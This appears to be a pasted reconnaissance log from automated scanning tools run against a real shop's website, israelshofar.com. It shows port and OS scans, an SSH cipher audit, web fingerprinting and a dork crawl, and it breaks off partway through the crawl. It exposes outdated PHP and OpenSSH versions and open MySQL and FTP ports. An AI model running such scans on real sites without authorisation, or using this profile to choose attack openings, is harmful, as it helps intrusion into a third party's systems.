  657. Running collector: Censys... Skipped
  658. -> Key 'censys_secret' has not been set
  659. Running collector: Wayback Machine... Done (2 hosts)
  660. Running collector: PTRArchive... Error
  661. -> PTRArchive returned unexpected response code: 502
  662. Running collector: PassiveTotal... Skipped
  663. -> Key 'passivetotal_key' has not been set
  664. Running collector: Shodan... Skipped
  665. -> Key 'shodan' has not been set
  666. Running collector: Riddler... Skipped
  667. -> Key 'riddler_username' has not been set
  668. Running collector: VirusTotal... Skipped
  669. -> Key 'virustotal' has not been set
  670. Running collector: Dictionary... Done (0 hosts)
  671. Running collector: HackerTarget... Done (1 host)
  672. Running collector: Google Transparency Report... Done (0 hosts)
  673. Running collector: Certificate Search... Done (0 hosts)
  674.  
  675. Resolving 2 unique hosts...
  676. 143.95.226.53 israelshofar.com
  677. 143.95.226.53 www.israelshofar.com
  678.  
  679. Found subnets:
  680.  
  681. - 143.95.226.0-255 : 2 hosts
  682.  
  683. Wrote 2 hosts to:
  684.  
  685. - file:///root/aquatone/www.israelshofar.com/hosts.txt
  686. - file:///root/aquatone/www.israelshofar.com/hosts.json
  687. __
  688. ____ _____ ___ ______ _/ /_____ ____ ___
  689. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  690. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  691. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  692. /_/ takeover v0.5.0 - by @michenriksen
  693.  
  694. Loaded 2 hosts from /root/aquatone/www.israelshofar.com/hosts.json
  695. Loaded 25 domain takeover detectors
  696.  
  697. Identifying nameservers for www.israelshofar.com... Done
  698. Using nameservers:
  699.  
  700. - 169.55.246.167
  701. - 108.168.166.90
  702.  
  703. Checking hosts for domain takeover vulnerabilities...
  704.  
  705. Finished checking hosts:
  706.  
  707. - Vulnerable : 0
  708. - Not Vulnerable : 2
  709.  
  710. Wrote 0 potential subdomain takeovers to:
  711.  
  712. - file:///root/aquatone/www.israelshofar.com/takeovers.json
  713.  
  714. __
  715. ____ _____ ___ ______ _/ /_____ ____ ___
  716. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  717. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  718. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  719. /_/ scan v0.5.0 - by @michenriksen
  720.  
  721. Loaded 2 hosts from /root/aquatone/www.israelshofar.com/hosts.json
  722.  
  723. Probing 2 ports...
  724. 80/tcp 143.95.226.53 israelshofar.com, www.israelshofar.com
  725. 443/tcp 143.95.226.53 israelshofar.com, www.israelshofar.com
  726.  
  727. Wrote open ports to file:///root/aquatone/www.israelshofar.com/open_ports.txt
  728. Wrote URLs to file:///root/aquatone/www.israelshofar.com/urls.txt
  729. __
  730. ____ _____ ___ ______ _/ /_____ ____ ___
  731. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  732. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  733. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  734. /_/ gather v0.5.0 - by @michenriksen
  735.  
  736. Processing 4 pages...
  737.  
  738. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  739.  
  740. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  741.  
  742. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  743.  
  744. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  745. #######################################################################################################################################
  746. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-14 10:17 EST
  747. Nmap scan report for www.israelshofar.com (143.95.226.53)
  748. Host is up (0.23s latency).
  749. Not shown: 459 closed ports, 3 filtered ports
  750. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  751. PORT STATE SERVICE
  752. 21/tcp open ftp
  753. 22/tcp open ssh
  754. 53/tcp open domain
  755. 80/tcp open http
  756. 110/tcp open pop3
  757. 143/tcp open imap
  758. 443/tcp open https
  759. 465/tcp open smtps
  760. 587/tcp open submission
  761. 993/tcp open imaps
  762. 995/tcp open pop3s
  763. 3306/tcp open mysql
  764. 8080/tcp open http-proxy
  765. 8443/tcp open https-alt
  766. ######################################################################################################################################
  767. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-14 10:17 EST
  768. Nmap scan report for www.israelshofar.com (143.95.226.53)
  769. Host is up (0.20s latency).
  770. Not shown: 11 closed ports, 2 filtered ports
  771. PORT STATE SERVICE
  772. 53/udp open domain
  773.  
  774. Nmap done: 1 IP address (1 host up) scanned in 22.71 seconds
  775. #######################################################################################################################################
  776. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-14 10:18 EST
  777. Nmap scan report for www.israelshofar.com (143.95.226.53)
  778. Host is up (0.22s latency).
  779.  
  780. PORT STATE SERVICE VERSION
  781. 21/tcp open ftp Pure-FTPd
  782. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  783. Device type: WAP
  784. Running: Linux 2.4.X|2.6.X
  785. OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
  786. OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
  787. Network Distance: 12 hops
  788.  
  789. TRACEROUTE (using port 21/tcp)
  790. HOP RTT ADDRESS
  791. 1 103.41 ms 10.252.200.1
  792. 2 106.07 ms 185.94.189.129
  793. 3 103.70 ms 185.206.226.109
  794. 4 104.32 ms prs-b8-link.telia.net (213.248.70.225)
  795. 5 224.82 ms prs-bb3-link.telia.net (62.115.138.132)
  796. 6 227.46 ms 80.91.251.243
  797. 7 232.57 ms 62.115.141.243
  798. 8 220.23 ms 80.91.246.75
  799. 9 224.83 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  800. 10 220.21 ms 207.210.229.6
  801. 11 219.80 ms 174.136.31.218
  802. 12 ... 30
  803. #######################################################################################################################################
  804. # general
  805. (gen) banner: SSH-2.0-OpenSSH_5.3
  806. (gen) software: OpenSSH 5.3
  807. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
  808. (gen) compression: enabled (zlib@openssh.com)
  809.  
  810. # key exchange algorithms
  811. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  812. `- [info] available since OpenSSH 4.4
  813.  
  814. # host-key algorithms
  815. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  816. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  817. `- [warn] using small 1024-bit modulus
  818. `- [warn] using weak random number generator could reveal the key
  819. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  820.  
  821. # encryption algorithms (ciphers)
  822. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  823. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  824. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  825.  
  826. # message authentication code algorithms
  827. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  828. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  829. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  830. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  831. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  832. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  833. `- [warn] using encrypt-and-MAC mode
  834. `- [info] available since OpenSSH 2.5.0
  835. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  836. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  837. `- [warn] using encrypt-and-MAC mode
  838. `- [info] available since OpenSSH 2.1.0
  839.  
  840. # algorithm recommendations (for OpenSSH 5.3)
  841. (rec) -ssh-dss -- key algorithm to remove
  842. (rec) -hmac-ripemd160 -- mac algorithm to remove
  843. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  844. #######################################################################################################################################
  845. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-14 10:29 EST
  846. Nmap scan report for www.israelshofar.com (143.95.226.53)
  847. Host is up (0.22s latency).
  848.  
  849. PORT STATE SERVICE VERSION
  850. 22/tcp closed ssh
  851. Too many fingerprints match this host to give specific OS details
  852. Network Distance: 13 hops
  853.  
  854. TRACEROUTE (using port 22/tcp)
  855. HOP RTT ADDRESS
  856. 1 102.72 ms 10.252.200.1
  857. 2 ...
  858. 3 103.14 ms 185.206.226.109
  859. 4 103.18 ms 213.248.70.225
  860. 5 220.19 ms prs-bb3-link.telia.net (62.115.138.132)
  861. 6 229.53 ms 62.115.123.12
  862. 7 202.91 ms atl-b22-link.telia.net (62.115.125.191)
  863. 8 238.95 ms nyk-bb3-link.telia.net (213.155.131.145)
  864. 9 220.54 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  865. 10 221.14 ms 207.210.229.6
  866. 11 226.94 ms 207.210.229.6
  867. 12 227.54 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  868. 13 220.08 ms 143.95.226.53
  869. ######################################################################################################################################
  870. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-14 10:30 EST
  871. Nmap scan report for www.israelshofar.com (143.95.226.53)
  872. Host is up (0.22s latency).
  873.  
  874. PORT STATE SERVICE VERSION
  875. 53/tcp open domain?
  876. |_dns-fuzz: Server didn't response to our probe, can't fuzz
  877. | dns-nsec-enum:
  878. |_ No NSEC records found
  879. | dns-nsec3-enum:
  880. |_ DNSSEC NSEC3 not supported
  881. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  882. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.2 - 3.8 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (94%), Grandstream GXV3275 video phone (93%), Linux 3.3 (93%), Linux 2.6.32 - 2.6.39 (92%), HP P2000 G3 NAS device (92%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%)
  883. No exact OS matches for host (test conditions non-ideal).
  884. Network Distance: 13 hops
  885.  
  886. Host script results:
  887. | dns-blacklist:
  888. | SPAM
  889. |_ list.quorum.to - FAIL
  890.  
  891. TRACEROUTE (using port 53/tcp)
  892. HOP RTT ADDRESS
  893. 1 103.15 ms 10.252.200.1
  894. 2 179.70 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  895. 3 103.62 ms 185.206.226.109
  896. 4 103.60 ms 213.248.70.225
  897. 5 214.46 ms prs-bb3-link.telia.net (62.115.138.132)
  898. 6 214.48 ms prs-bb4-link.telia.net (62.115.137.115)
  899. 7 202.09 ms 62.115.125.191
  900. 8 219.68 ms 80.91.246.75
  901. 9 219.68 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
  902. 10 220.05 ms 207.210.229.6
  903. 11 226.03 ms 80.91.246.75
  904. 12 225.73 ms 174.136.31.218
  905. 13 219.10 ms 143.95.226.53
  906. #######################################################################################################################################
  907. http://www.israelshofar.com [301 Moved Permanently] Country[UNITED STATES][US], IP[143.95.226.53], RedirectLocation[https://www.israelshofar.com/index.php?_route_=403.shtml], Title[301 Moved Permanently]
  908. https://www.israelshofar.com/index.php?_route_=403.shtml [404 Not Found] Cookies[PHPSESSID,currency,language], Country[UNITED STATES][US], Google-Analytics[Universal][UA-3087574-3], HTML5, HTTPServer[nginx/1.14.1], IP[143.95.226.53], JQuery[1.7.1], PHP[5.4.45], Script[text/javascript], Title[The page you requested cannot be found!], X-Powered-By[PHP/5.4.45], nginx[1.14.1]
  909. ######################################################################################################################################
  910.  
  911. wig - WebApp Information Gatherer
  912.  
  913.  
  914. Scanning https://www.israelshofar.com...
  915. ____________________ SITE INFO _____________________
  916. IP Title
  917. 143.95.226.53 Shofar from Jerusalem – Special Sho
  918.  
  919. _____________________ VERSION ______________________
  920. Name Versions Type
  921. PHP 5.4.45 Platform
  922. nginx 1.14.1 Platform
  923. FreeBSD 10 | 11 OS
  924. OpenBSD 5.9 OS
  925.  
  926. ___________________ INTERESTING ____________________
  927. URL Note Type
  928. /robots.txt robots.txt index Interesting
  929.  
  930. ____________________________________________________
  931. Time: 1.7 sec Urls: 616 Fingerprints: 40401
  932. #######################################################################################################################################
  933. HTTP/1.1 301 Moved Permanently
  934. Date: Wed, 14 Nov 2018 15:41:31 GMT
  935. Content-Type: text/html; charset=iso-8859-1
  936. Content-Length: 20
  937. Location: https://www.israelshofar.com/
  938. Cache-Control: max-age=604800
  939. Expires: Wed, 21 Nov 2018 15:41:31 GMT
  940. Vary: Accept-Encoding
  941. Content-Encoding: gzip
  942. Connection: keep-alive
  943. #######################################################################################################################################
  944. --------------------------------------------------------------------------------------------------------------------------------------
  945.  
  946. [ ! ] Starting SCANNER INURLBR 2.1 at [14-11-2018 10:42:13]
  947. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  948. It is the end user's responsibility to obey all applicable local, state and federal laws.
  949. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  950.  
  951. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.israelshofar.com.txt ]
  952. [ INFO ][ DORK ]::[ site:www.israelshofar.com ]
  953. [ INFO ][ SEARCHING ]:: {
  954. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.me ]
  955.  
  956. [ INFO ][ SEARCHING ]::
  957. -[:::]
  958. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  959.  
  960. [ INFO ][ SEARCHING ]::
  961. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  962. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.qa ID: 002901626849897788481:cpnctza84gq ]
  963.  
  964. [ INFO ][ SEARCHING ]::
  965. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  966.  
  967. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  968.  
  969.  
  970. _[ - ]::--------------------------------------------------------------------------------------------------------------
  971. |_[ + ] [ 0 / 100 ]-[10:42:23] [ - ]
  972. |_[ + ] Target:: [ https://www.israelshofar.com/ ]
  973. |_[ + ] Exploit::
  974. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  975. |_[ + ] More details:: / - / , ISP:
  976. |_[ + ] Found:: UNIDENTIFIED
  977.  
  978. _[ - ]::--------------------------------------------------------------------------------------------------------------
  979. |_[ + ] [ 1 / 100 ]-[10:42:25] [ - ]
  980. |_[ + ] Target:: [ https://www.israelshofar.com/shofar ]
  981. |_[ + ] Exploit::
  982. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  983. |_[ + ] More details:: / - / , ISP:
  984. |_[ + ] Found:: UNIDENTIFIED
  985.  
  986. _[ - ]::--------------------------------------------------------------------------------------------------------------
  987. |_[ + ] [ 2 / 100 ]-[10:42:28] [ - ]
  988. |_[ + ] Target:: [ https://www.israelshofar.com/tallit ]
  989. |_[ + ] Exploit::
  990. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  991. |_[ + ] More details:: / - / , ISP:
  992. |_[ + ] Found:: UNIDENTIFIED
  993.  
  994. _[ - ]::--------------------------------------------------------------------------------------------------------------
  995. |_[ + ] [ 3 / 100 ]-[10:42:29] [ - ]
  996. |_[ + ] Target:: [ https://www.israelshofar.com/yemenite-shofar ]
  997. |_[ + ] Exploit::
  998. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  999. |_[ + ] More details:: / - / , ISP:
  1000. |_[ + ] Found:: UNIDENTIFIED
  1001.  
  1002. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1003. |_[ + ] [ 4 / 100 ]-[10:42:30] [ - ]
  1004. |_[ + ] Target:: [ http://www.israelshofar.com/Carmel-Talis ]
  1005. |_[ + ] Exploit::
  1006. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1007. |_[ + ] More details:: / - / , ISP:
  1008. |_[ + ] Found:: UNIDENTIFIED
  1009.  
  1010. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1011. |_[ + ] [ 5 / 100 ]-[10:42:32] [ - ]
  1012. |_[ + ] Target:: [ https://www.israelshofar.com/engraved-shofar ]
  1013. |_[ + ] Exploit::
  1014. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1015. |_[ + ] More details:: / - / , ISP:
  1016. |_[ + ] Found:: UNIDENTIFIED
  1017.  
  1018. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1019. |_[ + ] [ 6 / 100 ]-[10:42:33] [ - ]
  1020. |_[ + ] Target:: [ http://www.israelshofar.com/Maalot-Tallis ]
  1021. |_[ + ] Exploit::
  1022. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1023. |_[ + ] More details:: / - / , ISP:
  1024. |_[ + ] Found:: UNIDENTIFIED
  1025.  
  1026. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1027. |_[ + ] [ 7 / 100 ]-[10:42:34] [ - ]
  1028. |_[ + ] Target:: [ https://www.israelshofar.com/shabbat ]
  1029. |_[ + ] Exploit::
  1030. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1031. |_[ + ] More details:: / - / , ISP:
  1032. |_[ + ] Found:: UNIDENTIFIED
  1033.  
  1034. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1035. |_[ + ] [ 8 / 100 ]-[10:42:36] [ - ]
  1036. |_[ + ] Target:: [ https://www.israelshofar.com/IsraelShofar ]
  1037. |_[ + ] Exploit::
  1038. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1039. |_[ + ] More details:: / - / , ISP:
  1040. |_[ + ] Found:: UNIDENTIFIED
  1041.  
  1042. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1043. |_[ + ] [ 9 / 100 ]-[10:42:38] [ - ]
  1044. |_[ + ] Target:: [ https://www.israelshofar.com/emanuel ]
  1045. |_[ + ] Exploit::
  1046. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1047. |_[ + ] More details:: / - / , ISP:
  1048. |_[ + ] Found:: UNIDENTIFIED
  1049.  
  1050. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1051. |_[ + ] [ 10 / 100 ]-[10:42:40] [ - ]
  1052. |_[ + ] Target:: [ https://www.israelshofar.com/holidays ]
  1053. |_[ + ] Exploit::
  1054. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1055. |_[ + ] More details:: / - / , ISP:
  1056. |_[ + ] Found:: UNIDENTIFIED
  1057.  
  1058. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1059. |_[ + ] [ 11 / 100 ]-[10:42:41] [ - ]
  1060. |_[ + ] Target:: [ https://www.israelshofar.com/faq ]
  1061. |_[ + ] Exploit::
  1062. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1063. |_[ + ] More details:: / - / , ISP:
  1064. |_[ + ] Found:: UNIDENTIFIED
  1065.  
  1066. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1067. |_[ + ] [ 12 / 100 ]-[10:42:43] [ - ]
  1068. |_[ + ] Target:: [ https://www.israelshofar.com/kittel- ]
  1069. |_[ + ] Exploit::
  1070. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1071. |_[ + ] More details:: / - / , ISP:
  1072. |_[ + ] Found:: UNIDENTIFIED
  1073.  
  1074. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1075. |_[ + ] [ 13 / 100 ]-[10:42:45] [ - ]
  1076. |_[ + ] Target:: [ https://www.israelshofar.com/Jerusalem-Tefillin-Cases ]
  1077. |_[ + ] Exploit::
  1078. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1079. |_[ + ] More details:: / - / , ISP:
  1080. |_[ + ] Found:: UNIDENTIFIED
  1081.  
  1082. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1083. |_[ + ] [ 14 / 100 ]-[10:42:46] [ - ]
  1084. |_[ + ] Target:: [ http://www.israelshofar.com/emanuel?product_id=279 ]
  1085. |_[ + ] Exploit::
  1086. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1087. |_[ + ] More details:: / - / , ISP:
  1088. |_[ + ] Found:: UNIDENTIFIED
  1089.  
  1090. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1091. |_[ + ] [ 15 / 100 ]-[10:42:47] [ - ]
  1092. |_[ + ] Target:: [ https://www.israelshofar.com/Tefillin-Velvet-Box ]
  1093. |_[ + ] Exploit::
  1094. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1095. |_[ + ] More details:: / - / , ISP:
  1096. |_[ + ] Found:: UNIDENTIFIED
  1097.  
  1098. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1099. |_[ + ] [ 16 / 100 ]-[10:42:48] [ - ]
  1100. |_[ + ] Target:: [ https://www.israelshofar.com/Decorative-Mezuzah-Case ]
  1101. |_[ + ] Exploit::
  1102. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1103. |_[ + ] More details:: / - / , ISP:
  1104. |_[ + ] Found:: UNIDENTIFIED
  1105.  
  1106. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1107. |_[ + ] [ 17 / 100 ]-[10:42:49] [ - ]
  1108. |_[ + ] Target:: [ http://www.israelshofar.com/shofar?limit=25 ]
  1109. |_[ + ] Exploit::
  1110. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, , IP:143.95.226.53:80
  1111. |_[ + ] More details:: / - / , ISP:
  1112. |_[ + ] Found:: UNIDENTIFIED
  1113.  
  1114. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1115. |_[ + ] [ 18 / 100 ]-[10:42:52] [ - ]
  1116. |_[ + ] Target:: [ https://www.israelshofar.com/Aluminium-Mezuzahs-Case ]
  1117. |_[ + ] Exploit::
  1118. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1119. |_[ + ] More details:: / - / , ISP:
  1120. |_[ + ] Found:: UNIDENTIFIED
  1121.  
  1122. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1123. |_[ + ] [ 19 / 100 ]-[10:42:54] [ - ]
  1124. |_[ + ] Target:: [ https://www.israelshofar.com/Anointing Oil ]
  1125. |_[ + ] Exploit::
  1126. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1127. |_[ + ] More details:: / - / , ISP:
  1128. |_[ + ] Found:: UNIDENTIFIED
  1129.  
  1130. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1131. |_[ + ] [ 20 / 100 ]-[10:42:55] [ - ]
  1132. |_[ + ] Target:: [ https://www.israelshofar.com/purple-tallit- ]
  1133. |_[ + ] Exploit::
  1134. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1135. |_[ + ] More details:: / - / , ISP:
  1136. |_[ + ] Found:: UNIDENTIFIED
  1137.  
  1138. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1139. |_[ + ] [ 21 / 100 ]-[10:42:57] [ - ]
  1140. |_[ + ] Target:: [ https://www.israelshofar.com/index.php?_route_=shofar ]
  1141. |_[ + ] Exploit::
  1142. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1143. |_[ + ] More details:: / - / , ISP:
  1144. |_[ + ] Found:: UNIDENTIFIED
  1145.  
  1146. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1147. |_[ + ] [ 22 / 100 ]-[10:42:58] [ - ]
  1148. |_[ + ] Target:: [ https://www.israelshofar.com/silk-talis- ]
  1149. |_[ + ] Exploit::
  1150. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1151. |_[ + ] More details:: / - / , ISP:
  1152. |_[ + ] Found:: UNIDENTIFIED
  1153.  
  1154. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1155. |_[ + ] [ 23 / 100 ]-[10:43:00] [ - ]
  1156. |_[ + ] Target:: [ https://www.israelshofar.com/holidays/passover- ]
  1157. |_[ + ] Exploit::
  1158. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1159. |_[ + ] More details:: / - / , ISP:
  1160. |_[ + ] Found:: UNIDENTIFIED
  1161.  
  1162. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1163. |_[ + ] [ 24 / 100 ]-[10:43:01] [ - ]
  1164. |_[ + ] Target:: [ https://www.israelshofar.com/light-tallit- ]
  1165. |_[ + ] Exploit::
  1166. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1167. |_[ + ] More details:: / - / , ISP:
  1168. |_[ + ] Found:: UNIDENTIFIED
  1169.  
  1170. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1171. |_[ + ] [ 25 / 100 ]-[10:43:03] [ - ]
  1172. |_[ + ] Target:: [ https://www.israelshofar.com/Bar-Mitzvah-Tefillin-Kit ]
  1173. |_[ + ] Exploit::
  1174. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1175. |_[ + ] More details:: / - / , ISP:
  1176. |_[ + ] Found:: UNIDENTIFIED
  1177.  
  1178. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1179. |_[ + ] [ 26 / 100 ]-[10:43:04] [ - ]
  1180. |_[ + ] Target:: [ https://www.israelshofar.com/Tefillin-Pshutot-Mehudarot-kit ]
  1181. |_[ + ] Exploit::
  1182. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1183. |_[ + ] More details:: / - / , ISP:
  1184. |_[ + ] Found:: UNIDENTIFIED
  1185.  
  1186. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1187. |_[ + ] [ 27 / 100 ]-[10:43:06] [ - ]
  1188. |_[ + ] Target:: [ https://www.israelshofar.com/Mezuzah-Parchment- Mehudar ]
  1189. |_[ + ] Exploit::
  1190. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1191. |_[ + ] More details:: / - / , ISP:
  1192. |_[ + ] Found:: UNIDENTIFIED
  1193.  
  1194. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1195. |_[ + ] [ 28 / 100 ]-[10:43:08] [ - ]
  1196. |_[ + ] Target:: [ https://www.israelshofar.com/Shalom-Talis ]
  1197. |_[ + ] Exploit::
  1198. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1199. |_[ + ] More details:: / - / , ISP:
  1200. |_[ + ] Found:: UNIDENTIFIED
  1201.  
  1202. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1203. |_[ + ] [ 29 / 100 ]-[10:43:09] [ - ]
  1204. |_[ + ] Target:: [ https://www.israelshofar.com/silk-like-talis-shoham ]
  1205. |_[ + ] Exploit::
  1206. |_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: nginx/1.14.1 X-Powered-By: PHP/5.4.45, IP:143.95.226.53:443
  1207. |_[ + ] More details:: / - / , ISP:
  1208. |_[ + ] Found:: UNIDENTIFIED
  1209.  
  1210. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1211. |_[ + ] [ 30 / 100 ]-[10:43:11] [ - ]
  1212. |_[ + ] Target:: [ https://www.israelshofar.com/Tefillin-Ohr-Echad-Gasot ]
  1213. |_[ + ] Exploit::
